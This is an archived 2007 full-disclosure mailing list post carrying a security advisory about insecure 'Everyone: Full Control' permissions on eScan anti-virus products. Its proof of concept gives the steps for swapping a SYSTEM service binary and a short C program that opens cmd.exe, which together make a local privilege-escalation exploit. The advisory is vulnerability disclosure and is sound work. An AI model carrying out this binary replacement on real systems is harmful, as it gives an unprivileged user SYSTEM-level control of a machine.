'[Full-disclosure] Multiple eScan products insecure file permissions'

[prev in list] [next in list] [prev in thread] [next in thread] 

List:       full-disclosure
Subject:    [Full-disclosure] Multiple eScan products insecure file permissions
From:       <edi.strosar () varnostne-novice ! com>
Date:       2007-08-29 22:27:07
Message-ID: web-23644876 () bk3 ! webmaillogin ! com
[Download RAW message or body]


=========================================================================
Team Intell Security Advisory TISA2007-13-Public
-------------------------------------------------------------------------
Multiple eScan products insecure file permissions
=========================================================================

Release date:    30.08.2007
Severity:        Moderately critical
Impact:          Privilege escalation
Remote:          No
Status:          Unpatched
Software:        eScan Virus Control 9.0.722.1
                  eScan Anti-Virus 9.0.722.1
                  eScan Internet Security 9.0.722.1
Tested on:       Microsoft Windows XP SP2
Vendor:          http://www.mwti.net/
Disclosed by:    Edi Strosar (Team Intell)


Vendor's description of affected application(s):
================================================
"eScan is the latest offering from MicroWorld Technologies 
Inc. It offers a combination of features to help you fight 
the threat of viruses, set security policies for parental 
control over content accessed by your child. It guards 
against Internet misuse, block spam and offensive mails 
and block popup ads."

Download link:
http://www.mwti.net/products/download_center.asp


Analysis:
=========
eScan product line is prone to security issue which can be 
exploited by LUA users to gain escalated privileges.

The problem is caused due to the application setting 
insecure default permissions (grants Everyone:Full 
Control) on the eScan installation directory and all it's 
child objects. This can be exploited to remove, 
manipulate, and replace any of the application's files.

Successful exploitation allows execution of arbitrary code 
with SYSTEM privileges.


Proof of concept:
=================
- logon as LUA user
- rename traysser.exe to traysser.exe.BAK
- copy program.exe to eScan installation directory
- rename program.exe to traysser.exe
- restart the computer
- "rootshell" ;)

NOTE: traysser.exe is eScan Server Updater Service that 
runs as NT AUTHORITY\SYSTEM.

Tested on multiple eScan products v9.0.722.1. Other 
products/versions may be affected.


Source code for program.exe:
============================
#include <stdio.h>

int main()
{
   system("cmd.exe");
   return 0;
}


Solution:
=========
Set proper permissions on the eScan installation directory 
and all it's child objects. NOTE: this may impact the 
functionality.


Timeline:
=========
10.08.2007 - initial vendor notification
20.08.2007 - additional vendor notification
30.08.2007 - public disclosure


Contact:
========
Maldin d.o.o.
Trzaska cesta 2
1000 Ljubljana - SI

tel: +386 (0)590 70 170
fax: +386 (0)590 70 177
gsm: +386 (0)31 816 400
web: www.teamintell.com
e-mail: info@teamintell.com


Disclaimer:
===========
The content of this report is purely informational and 
meant for educational purposes only. Maldin d.o.o. shall 
in no event be liable for any damage whatsoever, direct or 
implied, arising from use or spread of this information. 
Any use of information in this advisory is entirely at 
user's own risk.

=========================================================================

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
[prev in list] [next in list] [prev in thread] [next in thread]
Configure | About | News | Add a list | Sponsored by KoreLogic